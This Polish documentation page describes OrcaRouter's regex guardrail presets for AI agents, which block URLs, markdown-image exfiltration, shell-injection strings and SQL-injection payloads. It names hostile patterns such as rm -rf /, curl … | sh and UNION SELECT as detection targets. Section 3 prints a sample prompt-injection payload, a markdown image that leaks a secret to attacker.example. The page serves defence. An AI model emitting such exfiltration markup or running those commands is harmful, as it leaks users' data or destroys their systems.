Guardrails agentowe - OrcaRouter

Gdy model napędza narzędzia, niebezpieczne łańcuchy chowają się w zwykłej treści: URL, który agent zaraz pobierze, obraz markdown, który klient auto-załaduje, rm -rf /, które model odbija do narzędzia shell, UNION SELECT, które emituje dla runnera SQL do wykonania. Polityka treści, która myśli tylko o PII lub sekretach, pomija wszystkie cztery. Kategoria presetów Agent istnieje dokładnie dla tego kształtu — deterministyczne reguły regex, które blokują żądanie lub odpowiedź, zanim narzędzie poniżej w ogóle na nim zadziała. To skupiona strona docelowa dla przypadku agentowego. Pełny silnik guardrail — każdy typ reguły, pole, etap i trasę — znajdziesz w referencji Guardrails.

1. Dlaczego guardrails agenta to odrębna powierzchnia

Guardrail sprawdza treść — tekst w żądaniu i tekst w odpowiedzi. Dla agenta ten tekst staje się akcją: URL zostaje pobrany, markdown zostaje wyrenderowany, linia shell zostaje uruchomiona, SQL zostaje wykonany. Więc ten sam silnik block / mask, którego używasz dla PII, pełni tu podwójną służbę — zatrzymuje payload na bramie przed tym, jak warstwa narzędzi agenta może zamienić go w efekt uboczny. Kategoria Agent dostarcza cztery presety, każdy jedną regułą regex z akcją block, rozdzielone na dwa etapy:

URL Filter — input, block

Blokuje dowolny URL http(s) na żądaniu. Użyj go dla przepływów agenta, gdzie wychodzące URL-e muszą być na liście dozwolonych, a nie otwarte. Zasiany wzorzec dopasowuje dowolny URL; edytuj regex, by dopuścić konkretne domeny.

Markdown Image Block — output, block

Blokuje osadzenia obrazów markdown (![alt](url)) w odpowiedzi modelu. Broni przed eksfiltracją przez renderowanie obrazów na klientach, które auto-ładują zdalne obrazy — klasyczny kanał wycieku danych, gdzie wyrenderowany URL obrazu przemyca dane na zewnątrz.

Tool Call Shell Block — input, block

Blokuje oczywiste wzorce shell-injection w żądaniu (rm -rf /, curl … | sh, wget … | bash, eskalacja sudo). Użyj go dla przepływów agenta, które mogą przekazać wejście użytkownika do narzędzia shell.

SQL Injection in Output — output, block

Blokuje odpowiedzi modelu niosące klasyczne payloady SQL-injection (UNION SELECT, OR 1=1, DROP TABLE, terminatory komentarzy). Obrona w głąb dla narzędzi, które auto-wykonują SQL wyprodukowany przez model.

Dwa presety sprawdzają wejście, dwa wyjście. URL Filter i Tool Call Shell Block działają na żądaniu — zanim model się uruchomi, zanim jakakolwiek kwota jest mierzona. Markdown Image Block i SQL Injection in Output działają na odpowiedzi — po tym, jak model odpowie, zanim treść dotrze do twojego klienta lub jego warstwy narzędzi. Wiedza o tym, na którym etapie żyje ryzyko, to cała gra; zobacz Etap wejścia i Etap wyjścia.

2. Zastosuj guardrail agenta w konsoli

Każdy krok tutaj to akcja konsoli na hostowanej bramie pod twoją własną sesją. Tworzenie i edycja guardrails wymaga Developer+ w przestrzeni roboczej. Tylko końcowe wywołanie /v1/* używa klucza relay sk-orca-... — sam guardrail jest konfigurowany w całości w konsoli.

Otwórz szablon

W konsoli otwórz Guardrails, kliknij przycisk z podziałem New guardrail i wybierz preset z kategorii szablonów Agent — np. Markdown Image Block. Zasiewa pojedynczą regułę block regex na właściwym etapie.

Nazwij i zapisz

Nadaj mu nazwę (≤ 64 znaki), np. agent-rails, i zapisz. Preset to ziarno, nie blokada — dodaj pozostałe trzy reguły Agent lub edytuj regex swobodnie potem (zobacz §4).

Przetestuj w piaskownicy

Otwórz zakładkę Test wewnątrz edytora, wklej próbkę, wybierz pasujący etap i uruchom bieżącą politykę lokalnie — bez wywołania w górę, bez kwoty (zobacz §3).

Powiąż klucz

Edytuj klucz API i wybierz agent-rails z rozwijanej listy Guardrail (ustawia guardrail_id na kluczu) lub oznacz go jako domyślny przestrzeni roboczej. Zobacz Powiąż z kluczem i Domyślny dla konta.

3. Udowodnij to, zanim powiążesz

Udowodnij, że reguła działa, zanim jakikolwiek klucz na nią wskaże. Otwórz zakładkę Test, wybierz etap output i wklej odpowiedź, do której emitowania zatruta przez atakującego strona mogła nakłonić model:

Here is the result: ![status](https://attacker.example/track?d=secret)

Piaskownica ewaluuje bieżącą politykę lokalnie — nic nie jest wysyłane w górę, nic mierzone — i zwraca werdykt block nazywający regułę, która zadziałała. Po siatkę A/B wobec korpusu próbek adwersaryjnych i łagodnych harness ewaluacyjny mieszka o jedną zakładkę dalej.

4. Komponuj i stroj reguły

Cztery presety to ziarna. Częstym ruchem jest połączenie ich w jeden guardrail agent-rails i zacieśnienie każdego regex do twojego stosu:

Lista dozwolonych URL-i

Zacznij od URL Filter, potem edytuj regex, by blokował każdy URL poza twoimi usankcjonowanymi domenami — odwróć dopasowanie na listę dozwolonych zamiast zbiorczej blokady.

Autorzuj własne detektory

Dodaj regułę regex dla dowolnego kształtu payloadu, na którym zależy twoim narzędziom — wzorce RE2, liniowy czas, bez backreferencji. Wzorce kompilują się raz i są cache’owane między żądaniami.

Miksuj reguły Agent z resztą silnika w jednym guardrail. Sparuj je z regułą mask PII Shield lub blokadą wejścia Secrets Blocker — jedna polityka może nieść każdy typ reguły, a silnik składa je w pojedynczy werdykt. Zobacz Akcje po block vs. mask vs. flag.

5. Jak wygląda blokada

Każdy preset Agent używa akcji block. Zablokowane żądanie zwraca HTTP 400 z kodem błędu guardrail_blocked i komunikatem nazywającym guardrail oraz regułę, która zadziałała:

{
  "error": {
    "code": "guardrail_blocked",
    "message": "request blocked by guardrail \"agent-rails\""
  }
}

Zablokowane żądanie nie kosztuje kwoty — blokada na etapie wejścia (URL Filter, Tool Call Shell Block) działa przed pomiarem; blokada na etapie wyjścia (Markdown Image Block, SQL Injection in Output) zwraca wstępnie pobraną kwotę po odrzuceniu odpowiedzi — i jest oznaczone jako skip-retry, bo ponowne uruchomienie tego samego promptu po prostu znów by zablokowało. Zobacz błąd guardrail_blocked.

Block wyjścia jest egzekwowany też na streamingu. Dla dwóch presetów Agent na etapie wyjścia block trzyma w obie strony: na odpowiedzi nie-streamingowej odpowiedź jest sprawdzana, zanim wróci, a na odpowiedzi streamingowej skaner przecina strumień w locie, zanim jakakolwiek zablokowana treść dotrze do klienta. Zobacz Pokrycie streamingu.

6. Guardrails to treść; firewall to wywołania narzędzi

Guardrails agenta to silna pierwsza warstwa, ale rozumują o łańcuchach, nie semantyce narzędzi. Blokują linię shell w treści — nie rozumieją, że model wyemitował ustrukturyzowane tool_call do destrukcyjnego narzędzia ani że wychodzące żądanie zmierza do IP metadanych. Tą warstwą wywołań narzędzi jest Firewall: ocenia emitowane przez model tool_calls, MCP tools/call i wychodzący egress werdyktami jak allow / audit / deny / pending_approval. Oba się komponują — guardrails sprawdzają tekst, firewall rządzi akcją.

Firewall

Rządź emitowanymi przez model wywołaniami narzędzi, wywołaniami MCP i egressem werdyktami allow / audit / deny / approval.

Guardrails vs. Firewall

Kiedy sięgnąć po guardrail treści vs. firewall wywołań narzędzi — i jak uruchomić oba.

Zabezpieczanie agentów AI

Pełny stos kontrolny agenta: treść, narzędzia, MCP i egress.

Nadmierna sprawczość

Zagrożenie, które adresują te szyny — agent, który robi więcej, niż powinien.

7. Zobacz, co zadziałało

Każda reguła, która zadziała, rejestruje dopasowanie — typ reguły, akcję, etap i łańcuch szczegółów — pokazane w strumieniu Matches przestrzeni roboczej. Sam dopasowany podłańcuch jest rejestrowany tylko, gdy Log raw content jest włączone, co jest domyślnie wyłączone. Grupuj i filtruj strumień po guardrail, typie reguły i akcji, by obserwować wskaźnik trafień reguł agenta i stroić fałszywie pozytywne. Zobacz Strumień dopasowań, Logowanie i prywatność i Strojenie fałszywie pozytywnych.

8. Dokąd dalej

Reguły na etapie wyjścia

Jak sprawdzanie odpowiedzi działa dla Markdown Image Block i SQL Injection in Output.

Detektory regex

Autorzuj własne wzorce RE2, by rozszerzyć reguły Agent.

Eksfiltracja danych

Kanał eksfiltracji, który zamyka Markdown Image Block.

Niebezpieczne wywołania narzędzi

Dlaczego sama szyna treści nie wystarcza — sparuj ją z firewallem.

Guardrails agenta trzymają niebezpieczne łańcuchy z dala od treści, którą agent wysyła i otrzymuje. Aby rządzić akcjami, które agent podejmuje — sami wywołaniami narzędzi, wywołaniami MCP i egressem — przejdź wyżej do Firewalla i przeczytaj bazę zabezpieczania agentów AI. Po kompletny silnik guardrail zobacz referencję Guardrails.

​1. Dlaczego guardrails agenta to odrębna powierzchnia

​2. Zastosuj guardrail agenta w konsoli

​3. Udowodnij to, zanim powiążesz

​4. Komponuj i stroj reguły

Lista dozwolonych URL-i

Autorzuj własne detektory

​5. Jak wygląda blokada

​6. Guardrails to treść; firewall to wywołania narzędzi

Firewall

Guardrails vs. Firewall

Zabezpieczanie agentów AI

Nadmierna sprawczość

​7. Zobacz, co zadziałało

​8. Dokąd dalej

Reguły na etapie wyjścia

Detektory regex

Eksfiltracja danych

Niebezpieczne wywołania narzędzi

1. Dlaczego guardrails agenta to odrębna powierzchnia

2. Zastosuj guardrail agenta w konsoli

3. Udowodnij to, zanim powiążesz

4. Komponuj i stroj reguły

5. Jak wygląda blokada

6. Guardrails to treść; firewall to wywołania narzędzi

7. Zobacz, co zadziałało

8. Dokąd dalej